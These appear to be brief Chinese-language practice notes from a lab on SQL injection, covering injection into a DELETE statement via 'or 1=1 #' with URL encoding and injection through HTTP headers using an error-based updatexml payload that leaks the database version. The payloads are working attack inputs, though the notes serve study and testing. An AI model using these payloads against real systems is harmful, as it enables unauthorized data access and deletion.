一、delete注入
添加留言
添加 or 1=1 # 进行删除
进行url编码
删除成功:
二、http header注入
使用 ' 判断哪里存在sql注入
测试,使用 ' ' 发现成功
使用order by 判段是否为select查询,如果不是则使用updatexml
admin' or updatexml(2,concat(0x7e,(version())),0) or '
admin' or updatexml(2,concat(0x7e,(version())),0) or '